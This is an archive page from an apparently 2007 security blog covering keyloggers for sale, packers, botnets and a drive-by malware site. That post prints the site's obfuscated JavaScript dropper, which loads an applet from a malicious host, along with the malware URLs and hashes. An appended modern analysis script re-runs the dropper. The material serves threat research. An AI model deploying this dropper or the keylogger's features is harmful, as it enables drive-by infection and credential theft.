Ballistic Missile Defense Engagement Points

March 11, 2007
Outstanding animation covering pretty much all of the current engagement points in case a missile is fired from anywhere across the world, with total synchronization between air, land and naval forces, and I must say the background music is excellent too.

In a previous post, Who Needs Nuclear Weapons Anymore?, I provided my reflections on the overall shift in threats nowadays compared to those back in the Cold War days, which you may find informative, as well as an essay I wrote back in 1998. Cryptome's Eyeballing of Missile Defense is also worth going through.

Vladuz's Ebay CAPTCHA Populator

March 10, 2007
Nice slideshow courtesy of eWeek providing various screenshots related to Vladuz's impersonation attacks on Ebay:

"And whether or not Vladuz is responsible for writing a tool to automatically skim eBay customers accounts and thus cause sharp spikes in bogus listings being taken down and relisted multiple times a day, he or she has the mythic reputation at this point to be credited as the cause."

Compared to diversifying its targets, permanently sticking to Ebay as the main target is already prompting the Web icon to put more effort into tracking him down. Last year, for instance, automated bots exploited Ebay's CAPTCHA and started self-recommending each other, but with Vladuz's Ebay CAPTCHA Populator, improving the quality of Ebay's authentication process should get a higher priority than tracking him down, as another such tool will follow from someone else out there.

Photoshoping Your Reality

March 10, 2007
It's not just a stereotyped beauty model that advanced image editing tools and techniques can make you believe in; they can also influence your understanding of reality, as you can see in Wired's famous altered photos collection:

"A picture is worth a thousand words, and Photoshop and similar tools have made it easier than ever to make those words fib. But while computers enable easier and better photo manipulation, it is hardly a new phenomenon. Here is a sampling of some of the more famous altered photographs from the last century."

Here's a free service letting you fake photos. Here's another one, as well as a variant of mine in relation to a previous post.

Shots from the Malicious Wild West - Sample Three

March 10, 2007
Keyloggers on demand, the so-called zero day keyloggers created especially for use in targeted attacks, are something rather common these days. Among the many popular ones that have remained in service and been updated for over a year is The Rat! Keylogger. Here are the prices in virtual WMZ money for all of its versions:

The Rat! 7.0XP - 29 WMZ
The Rat! 6.0XP/6.1 - 22 WMZ
The Rat! 5.8XP - 15 WMZ
The Rat! 5.5XP - 13 WMZ
The Rat! 5.0XP - 9 WMZ
The Rat! 4.0XP - 8 WMZ
The Rat! 3.xx - 7 WMZ
The Rat! 2.xx - 6 WMZ

An automated translation of its features:

For installation on machines running Windows XP, Windows 2000 and systems based on them. Finale - apotheosis! Let us recall again why we love our rodent:
- the resulting file is record small: 13 312 bytes unpacked (6 793 bytes when packed with FSG!).
- not detected as a virus by antivirus products.
- monitors the clipboard.
- stealth system and firewall bypass.
- captures keystrokes in password windows and the console.
- sends logs by e-mail, with support for RFC 2554 authentication.
- encrypts the dump.
- configurable activation and stop times.
- self-removal at the specified time without leaving traces or requiring a reboot.

Digital fingerprints will follow as soon as I finish bruteforcing the password protected archives.

Shots from the Malicious Wild West - Sample Two

March 10, 2007
Packers are logically capable of rebooting the lifecycle of a binary and making it truly unrecognizable. The Pohernah Crypter is among the many recently released packers you might be interested in taking a peek at. By the time a packer's pattern becomes recognizable, a new one is introduced, and in special cases there are even packers taking advantage of flaws in the AV software itself.

Compared to the common wisdom that malware authors are self-sufficient and come up with packers by themselves, we've already seen cases where investment in purchasing commercial anti-debugging software is considered. You may find these test results of various anti-virus products against packed malware informative; as a matter of fact they truly back up my experience with the winning engines and their performance against packed malware.

File size: 6901 bytes
MD5: 6ce1283af00f650e125321c80bf42097
SHA1: 08ac9a9e2181d8a94e6d96311c21c8db1766e2f1

Shots from the Malicious Wild West - Sample One

March 10, 2007
Come to daddy. At _http://www.ms-counter.com we have a URL spreading malware through redirectors and the usual JavaScript obfuscation:

Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878

Then we get the following:

// custom base64 alphabet and decoder carried by the script itself
var keyStr = "ABCDEFGHIJKLMNO" + "PQRSTUVWXYZabcdefghijk" + "lmnopqrstuvwx" + "yz0123456789+/=";
function decode64(input) {
    var output = "";
    var chr1, chr2, chr3;
    var enc1, enc2, enc3, enc4;
    var i = 0;
    input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    do {
        enc1 = keyStr.indexOf(input.charAt(i++));
        enc2 = keyStr.indexOf(input.charAt(i++));
        enc3 = keyStr.indexOf(input.charAt(i++));
        enc4 = keyStr.indexOf(input.charAt(i++));
        chr1 = (enc1 << 2) | (enc2 >> 4);
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
        chr3 = ((enc3 & 3) << 6) | enc4;
        output = output + String.fromCharCode(chr1);
        if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
        if (enc4 != 64) { output = output + String.fromCharCode(chr3); }
    } while (i < input.length);
    return output;
}
// the decoded markup is written straight into the page
document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5qYXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291bnRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcmlwdCBsYW5ndWFnZT0nam ETC. ETC. ETC.

Deobfuscating the JavaScript, we get to see where the binary is:

Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898

Server Response:
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe

File info:
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484

Running it through VirusTotal gives the results you can see in the screenshot. It's obvious that the major AV products don't detect this one, but what you should keep in mind is the currently flawed signature-based malware detection approach; that's of course assuming someone even considers updating their AV software. In another analysis I'll present another binary that all major AV vendors detect, but the second-tier ones don't. Host-based IPS, behaviour blocking, and actually preventing the script from loading are the way to avoid exploitation of the flaws in signature-based scanning.
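As an added example (not code from the post or its author), here is one way an analyst recovers what such a script injects without rendering it in a browser: the dropper, with its decoder's mangled bit-shifts restored and the page's base64 payload (truncated on the page, so padded here with "=="), runs against a stub document whose write() only records the markup, which is then scanned for applet, script and param references. The stub, the extractor and the padding are this example's own assumptions.

```javascript
// Added example: capture what an obfuscated dropper writes into the page and
// list the loaders it references, without a browser and without fetching anything.

// Constructed input: the decode64 routine from the captured script (with the
// bit-shifts restored) and the visible prefix of the page's base64 payload.
// The prefix is truncated on the page, so it is padded with "==" to make it
// a complete base64 string.
const PAYLOAD_B64 =
  "IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5qYXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD" +
  "0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291bnRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+" +
  "PC9hcHBsZXQ+PHNjcmlwdCBsYW5ndWFnZT0nam==";

const DROPPER_SCRIPT = `
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function decode64(input) {
  var output = "", chr1, chr2, chr3, enc1, enc2, enc3, enc4, i = 0;
  input = input.replace(/[^A-Za-z0-9+\\/=]/g, "");
  do {
    enc1 = keyStr.indexOf(input.charAt(i++));
    enc2 = keyStr.indexOf(input.charAt(i++));
    enc3 = keyStr.indexOf(input.charAt(i++));
    enc4 = keyStr.indexOf(input.charAt(i++));
    chr1 = (enc1 << 2) | (enc2 >> 4);
    chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
    chr3 = ((enc3 & 3) << 6) | enc4;
    output = output + String.fromCharCode(chr1);
    if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
    if (enc4 != 64) { output = output + String.fromCharCode(chr3); }
  } while (i < input.length);
  return output;
}
document.write(decode64("${PAYLOAD_B64}"));
`;

// Run the script with a stub document whose write() only records markup.
// This is instrumentation, not isolation: the script still executes in this
// process, so run it on a disposable analysis host.
function captureDocumentWrites(scriptSource) {
  const written = [];
  const fakeDocument = { write: (html) => { written.push(String(html)); } };
  new Function("document", scriptSource)(fakeDocument);
  return written.join("");
}

// Pull loader-style tags and their attributes out of the captured markup.
// Unterminated tags (like the "<script language='j" left by the truncated
// payload) are ignored, which is itself a hint that the capture is partial.
function extractLoaders(html) {
  const tagRe = /<(applet|object|embed|iframe|script|param)\b([^>]*)>/gi;
  const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  const loaders = [];
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attrs = { tag: tag[1].toLowerCase() };
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      attrs[attr[1].toLowerCase()] = attr[2] ?? attr[3] ?? attr[4];
    }
    loaders.push(attrs);
  }
  return loaders;
}

// Every URL-valued attribute is a second-stage fetch: something to block at
// the proxy and to search for in web logs.
function secondStageUrls(loaders) {
  const urls = [];
  for (const loader of loaders) {
    for (const [name, value] of Object.entries(loader)) {
      if (name !== "tag" && /^https?:\/\//i.test(value)) urls.push(value);
    }
  }
  return urls;
}

const captured = captureDocumentWrites(DROPPER_SCRIPT);
const foundLoaders = extractLoaders(captured);
console.log(captured);
console.log(foundLoaders);
console.log(secondStageUrls(foundLoaders));
```

The captured markup is a 1x1 applet pulling ms-counter.jar with a url parameter pointing at load.php, which is the second-stage fetch the post goes on to retrieve.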

Envy These Women Please

March 09, 2007
Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up with a slideshow of the women billionaires it envies most:

"Imagine for a moment what it would be like to be a billionaire. No more picking up after the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save for an amazing vacation. For the women on Forbes' new list of the world's billionaires, that dream is a reality. But it's not just their 10-figure fortunes that make us envious. Some of these women are famous; some wield enormous power; some have fascinating careers. Some have all three."

Is it just me, or is inherited wealth boring right from the very beginning? The emergence of the spoon people, or so they say -- "Spoon feeding in the long run teaches us nothing but the shape of the spoon" (Edward Morgan Forster). A week ago I participated in a discussion about power, most importantly one trying to define power, and we ended up with several kinds of power: positional power (the C-level executives), expertise power (or the revenge of the underestimated walking case studies), and networking power. It's all a cyclical process, like pretty much anything in life.

U.K's Latest Military Satellite System

March 09, 2007
The U.K. military is about to upgrade its Skynet 4 satellite system to Skynet 5:

"Four steerable antennas give it the ability to focus bandwidth on to particular locations where it is most needed - where British forces are engaged in operations. Its technologies have also been designed to resist any interference - attempts to disable or take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. An advanced receive antenna allows the spacecraft to selectively listen to signals and filter out attempts to "jam" it."

Among the many features the new system introduces, two are worth mentioning: its ability to focus bandwidth where it's needed, and the sort of DENY:ALL upgraded receive antenna to avoid jamming. Now pray China won't take it down, or let the debris (conveniently) take care of the rest -- so vulnerable it makes you want to establish a space warfare code of conduct.

Armed Land Robots

March 09, 2007
After seeking to dominate the air, it's time for defense contractors to turn back to innovating on the ground, especially when we speak of armed and remotely controlled robots. Crucial for both reconnaissance and guerilla warfare situations, movement flexibility as well as payload capacity are what add more value to these robots. The Israeli defense contractor Elbit Systems recently introduced the Viper:

"The Viper, which is about a foot long and weighs approximately five pounds, is powered by a special electrical engine and operated by remote control or according to a program implanted in its 'brain' in advance. It is capable of climbing stairs, getting past obstacles and at the same time checks what is going on around it by means of a system of sensors. Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer has been installed. The Viper is carried to the battlefield by a soldier on his back in a special carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it from a distance."

I'm very interested in the possibility of a 360 degree view, its noise generation level, the variety of terrains it supports, and most importantly, whether it would put itself back on its "feet" if it inevitably turns upside down. See, you wouldn't want your pricey attack toy acting like a cheap remote-controlled toy car, would you? Engadget has a photo of the Viper.

Here's a recommended article on the history of armed UAVs, as well as a recent story on beam energy weapons, the vomit beam in this case.

UK Telecoms Lack of Web Site Privacy

March 08, 2007
When the U.S. and Canada are the benchmark, it's logical to conclude the U.K. gets poor ratings, as web site privacy, especially in the commercial sector, is something the U.S. and Canada tackled a long time ago. Taking the pragmatic perspective, does it really matter in times when government officials abuse commercially aggregated data, data they cannot legally obtain by themselves, and so have to act as paper tigers to access it? Here's an interesting analysis:

"The U.K. industry, however, performed much worse in privacy. Telecom firms, especially in the U.K., ask for more personal data than companies in other industries. This data is often unconnected to the request being made by the customer.

U.K. sites are generally unclear about data sharing practices, with 23 per cent judged to be explicit compared to 69 per cent in the U.S. Clarity in this area has made steady gains in the U.S. in the past 12 months, but the U.K. has shown no significant change.

It is not only clarity that fails in the U.K., but also the actual practices in place. Eleven of the 13 sites routinely share personal data with other internal groups, business partners or third parties without explicit permission. This compared poorly with the U.S., where 40 per cent share in the same way. The best performing site with regards to privacy in the U.K. was O2."

Moreover, the U.K., realizing its ongoing negative PR across the globe in respect to its CCTV surveillance myopia, has released a report claiming Italy's COMINT is worse than its (walking) CCTV surveillance efforts. To publish a privacy policy or not to publish a privacy policy? That "used to be" the question.

Steganography Applications Hash Set

March 08, 2007
Did you know that there are over 600 applications capable of using steganography to hide data? Me neither, but here's a company that's innovating in the field of detecting such ongoing communication:

"Backbone Security’s Steganography Analysis and Research Center (SARC) is pleased to announce the release of version 3.0 of SAFDB. With the fingerprints, or hash values, of every file artifact associated with 625 steganography applications, SAFDB is the world’s largest commercially available hash set exclusive to digital steganography and other information hiding applications. The database is used by Federal, state and local law enforcement; intelligence community; and private sector computer forensic examiners to detect the presence or use of steganography and extract hidden information.

Version 3.0 contains hash values for each file artifact associated with the 625 steganography applications computed with the CRC-32, MD5, SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512 algorithms.

A free extract of SAFDB with MD5 hashes only is available to qualifying law enforcement, government, and intelligence agency computer forensic examiners."

Chart courtesy of Huaiqing Wang and Shuozhong Wang. And here's a related post.

Distributed Computing with Malware

March 08, 2007
Distributed computing with malware infected PCs is nothing new as a concept; what's lacking is the botnet masters' desire to contribute processing power to anything socially oriented. That was until late last month, when members of Berkeley's BOINC project noticed a project that was becoming suspiciously popular and found out that malware infected PCs had the BOINC client installed to participate in it:

"It recently came to the attention of boinc staff that a multi-project cruncher called Wate who occupied a very high position in the boinc and project stats had reached this exalted position by dishonest means. In early June 2006 he appears to have released onto the internet a link purporting to provide Windows updates including now for Vista. Some 1500 members of the public worldwide downloaded these 'updates' which in fact consisted of a trojan application that downloaded boinc.exe and attached the person's computer to Wate's account, giving him the subsequent fraudulent credits. About 90% of the people affected appear to have uninstalled or disabled the unwanted boinc installation, but some compromised computers are still running and crashing climate models. Boinc and project staff have no means of contacting the owners of these computers."

If only botnet masters would take this note seriously, I'm sure we'd see certain networks controlling the top 10 positions at the BOINC project. A war on bandwidth or CPU power?

Documentary on ECHELON - The Spy System

March 07, 2007
Remember ECHELON? The über-secretive worldwide intelligence sharing network that various activists once tried to poison by generating fake suspicious traffic using predefined keywords? Well, the system is still operating, and with the lack of transparency in the participating countries' use and abuse of the technology, all we need is an EU alternative competing with the original.

Watch this excellent half-hour-long documentary and find out: "What exactly is Echelon? How can it invade privacy, yet protect liberty? How did this billion-dollar system miss the September 11th attacks? In a riveting hour, we uncover the mysterious, covert world of NSA's electronic espionage."


USB Surveillance Sticks

March 07, 2007
Despite the ongoing awareness built among enterprises and end users of the risks posed by removable media, there are vendors offering various surveillance solutions on a USB stick. Some are handy, others contradictory. And while RFID tags are getting smaller than a grain of rice, here are three surveillance solutions to keep in mind right next to the notorious KeyGhost hardware keylogger.

SnoopStick
An example of malware on demand at $59.95, which comes with lots of features as well as automatic updates:

"The SnoopStick monitoring components are completely hidden, and there are no telltale signs that the computer is being monitored. You can then unplug the SnoopStick and take it with you anywhere you go. No bigger than your thumb and less than 1/4" thick, you can carry it in your pocket, purse, or on your keychain. Any time you want to see what web sites your kids or employees are visiting, who they are chatting with, and what they are chatting about, simply plug in your SnoopStick to any Windows based computer with an Internet connection and a USB port. SnoopStick will automatically connect to the target computer."

TrackStick
Portable GPS surveillance with historical routes that look simply amazing when overlaid on Google Earth:

"The Track Stick will work anywhere on the planet Earth. Using the latest in GPS mapping technologies, your exact location can be shown on graphical maps and 3D satellite images. The Track Stick's micro computer contains special mathematical algorithms, that can calculate how long you have been indoors. While visiting family, friends or even shopping, the Track Stick can accurately time and map each and every place you have been."

GadgetTrack
An interoperable surveillance solution supposed to assist you in case your iPod or even PSP gets stolen; all you have to do is infect your device and pray there's Internet connectivity at a later stage. Tracking your stolen devices is one thing, getting them back is completely another:

"What if your device could phone home? Well now it can. With our patent-pending GadgetTrak™ system, you simply register your device and install our agent files on your device. If your device is missing or stolen, you log into your account and flag the device as lost or stolen. The next time the device is accessed it will attempt to contact us and provide data regarding the system it is plugged into."

Death is Just an Upgrade

March 07, 2007
Started as a project to digitally mimic a human's behaviour 100%, the Virtual Soldier research program is getting more funding to accomplish its mission, and go beyond:

"In particular, the contract calls for the VSR team to further develop their "Predictive Dynamics" tools for use in calculating human motion in a military environment. Invented by VSR researchers, the field of Predictive Dynamics already has made a significant impact on the field of human motion simulation by making it possible -- for the first time ever -- to calculate the walking and running involved in human gait when given such variables as human body size, strength, weight, load-carrying abilities and clothing effects."

Next, Santos will find himself exposed to radiation, blown up into pieces, hit by a truck, or pretty much anything you would never get the chance to -- legally -- expose a living human to for testing purposes.

Botnet Communication Platforms

March 07, 2007
Botnets, or the automated exploitation and management of malware infected PCs, are perhaps the most popular and efficient cyber threat the Internet faces these days. Whether you define it as the war on bandwidth or as who's commanding the largest infected population, this simple distributed hosts management problem continues to evolve so that the botnet masters remain undetected for as long as possible. On the other hand, the growing Internet population combined with the lack of awareness of the "just got a PC for Christmas" users, and IPv4's well known susceptibility to IP spoofing compared to IPv6, always make the concept an interesting one to follow.

Although at the beginning of 2006 I pointed out how malware related documentation and howtos turned into open source code, resulting in a flood of malware variants and thus lowering the entry barriers for novice malware copycats, a week ago I located a very thorough document on various botnet communication platforms, and I'm sure its author wouldn't mind me reposting the fancy graphs and commenting on them.

IRC based Botnet Communications
Nothing ground breaking in this one besides the various advice on stripping down the IRCd, creating one's own network of IRC servers rather than using public ones, and the importance of distributed secrecy of the botnet participants' IPs, namely that each bot never knows the exact number or location of all servers and bots.

HTTP Botnet Communications

The possibilities with PHP and MySQL in respect to flexibility of the statistics, layered encryption and tunneling, and most importantly decentralizing the command channel, even improving authentication with port knocking, are countless. Besides, with all the buzz about botnets continuing to use IRC, it's a rather logical move for botnet masters to shift to other platforms, where communicating amid HTTP's noise improves their chances of remaining undetected. Rather ironically, the author warns of possible SQL injection vulnerabilities in the botnet's command panel.

ICQ Botnet Communications
Perhaps among the main reasons to repost these graphs was the ICQ communication platform, which I'll leave up to you to figure out. The reliance on icq.com is listed as a major weakness, but as we've already seen cases of botnets obtaining their commands by visiting an IRC channel and processing its topic, in this case it's ICQ WhiteLists getting the attention.

Related comments on the programming "know-how" discussed will follow. Know your Enemy!

Real Time Censored URL Check in China

March 02, 2007
While the original initiative for a real-time URL censorship check in China was realized as a project by Jonathan Zittrain and Benjamin Edelman a couple of years ago, it's great to see someone continued what they started and came up with GreatFirewallofChina.org:

"Aim of this website is to be a watchdog and keep track of which and how many or how many times sites are censored. Help to keep the censorship transparent. Each blocked website will automatically be added to the great firewall on the homepage."

What you should keep in mind is that despite the capability for URL checking, from a technical perspective the censorship in China is much more sophisticated. Realizing that URLs themselves can be obfuscated, and that proxies and many other alternatives such as Tor can be used, dynamic page content scanning for subversive keywords, and the same technique applied to SMS messages, is what I have in mind. For instance, according to GreatFirewallofChina, blogspot.com is not blocked in the country, which doesn't mean a Taiwan independence related blog's content wouldn't get filtered. Moreover, it's perhaps even more disturbing to see various search results from a Chinese user's perspective than merely figuring out whether a URL is blocked or not. Here are two great screenshots confirming the twisted reality, and a recent summary of the situation in China.

It would be great to see how this project evolves and starts presenting its results by confirming whether or not a URL is blocked in all of the countries on the world's censorship map, or even better, starts feeding local search engines with possibly censored keywords, summarizing the results and emphasizing the big picture.

AdSense Click Fraud Rates

March 01, 2007
Google's single most profitable revenue source, AdSense, has always been under fire for click fraud, and most importantly the company has been under public scrutiny to better communicate its efforts on fighting the problem. Third party companies emerged and started filling the niche by coming up with click fraud analytics software so that Google's major customers, and even small to mid-size businesses, could take advantage of an automated way to analyze click anomalies. But how prevalent is the problem really? Should the discussion always orbit around Google's efforts, or its customers' vigilance and education on detecting click fraud, or should it shift to improving the communication between all participants, namely Google, its customers and the click auditing companies?

According to the most recent click fraud rate from Google, click fraud is only 0.002% of all clicks. Danny Sullivan has an in-depth analysis of the topic, emphasizing the importance of detected click fraud rates:

"Finally, we have a click fraud rate from Google itself: less than 0.02 percent of all clicks slip past its filters and are caught after advertisers request reviews. That low figure is sure to bring out the critics who will disagree. Below, more about how Google comes up with the figure plus some click fraud fighting initiatives it plans to implement later this year. Why release this figure now, when many have wanted it for literally years?

"We've been working to be more transparent and informative on the issues related to click fraud. Recently, this metric has been something advertisers have specifically asked for and we agree that is useful in describing the scope of the problem. Further, it is something we measure and use to monitor the performance of our click fraud detection systems," said Shuman Ghosemajumder, business product manager for trust & safety at Google."

In July 2006 Google commissioned a third-party analysis of its efforts to fight click fraud, which you will definitely find informative, and here's another research piece taking the discussion beyond the typical botnets and human clickers perspective. There are also false click fraud positives to keep in mind, as shown in this analysis.

Stats courtesy of Clickfraudindex, who by the way started blogging recently.

Social Engineering the Old Media

February 28, 2007
While the Rule of Thirds is partly in place, the floating fragrance and his depressed look provide some clues. The story is very interesting though, as it has happened before. As Tim Nudd comments on Adfreak:

"In Switzerland, it doesn’t take much to be in a Gucci ad campaign. You photograph yourself naked, add a perfume bottle and the Gucci logo, send it to a weekly paper, and have them bill Gucci directly for the $50,000. They’ll fall for it every time."

How could it have been prevented? By coordinating the campaign with local Gucci representatives, ensuring payment is processed before the ad is featured, or, let's just say, looking at his face to figure out he's anything but a professional model.

Storm Worm Switching Propagation Vectors

February 28, 2007
The storm started with mass mailings, then the malware switched to IM propagation, and now the infected PCs are further spreading it through blog and forum posts:

"But the twist comes when these people later post blogs or bulletin board notices. The software will insert into each of their postings a link to a malicious Web site, said Alperovitch, who rates the threat as "high." "We haven't seen the Web channel used before," he said. "In the past, we've seen malicious links distributed to people in a user's address book and made to look like it's an instant message coming from them."

The smart thing is that, compared to situations where malware authors have to figure out how to bypass the forum's CAPTCHA or mass spam and generate new blogs, in this case the (infected) end user is authenticating both himself and the malware. Here are some malware stats on social networking sites worth going through as well.

UPDATE: Symantec has a nice analysis with some screenshots of this variant.